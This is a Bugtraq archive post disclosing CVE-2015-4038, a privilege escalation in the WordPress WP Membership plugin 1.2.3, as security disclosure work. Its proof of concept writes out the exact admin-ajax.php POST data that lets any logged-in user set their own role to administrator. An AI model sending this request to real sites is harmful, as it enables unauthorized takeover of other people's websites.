[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

CVE-2015-4038 - WordPress WP Membership plugin [Privilege escalation]

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: CVE-2015-4038 - WordPress WP Membership plugin [Privilege escalation]
From: pan.vagenas@xxxxxxxxx
Date: Thu, 21 May 2015 20:39:15 GMT

# Exploit Title: WordPress WP Membership plugin [Privilege escalation]
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# CVE: CVE-2015-4038

1 Description
  
Any registered user can perform a privilege escalation through 
`iv_membership_update_user_settings` AJAX action. 
Although this exploit can be used to modify other plugin related data (eg 
payment status and expiry date), privilege escalation can lead to a serious 
incident because the malicious user can take administrative role to the 
infected website.
  
2 Proof of Concept

* Login as regular user
* Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` with 
data: 
`action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator`

3 Actions taken after discovery

Vendor was informed on 2015/05/19.
  
4 Solution
  
No official solution yet exists.

Prev by Date: CVE-2015-4039 - WordPress WP Membership plugin [Stored XSS]
Next by Date: [security bulletin] HPSBMU03336 rev.1- HP Helion OpenStack affected by VENOM, Denial of Service (DoS), Execution of Arbitrary Code
Previous by thread: CVE-2015-4039 - WordPress WP Membership plugin [Stored XSS]
Next by thread: [security bulletin] HPSBMU03336 rev.1- HP Helion OpenStack affected by VENOM, Denial of Service (DoS), Execution of Arbitrary Code
Index(es):
- Date
- Thread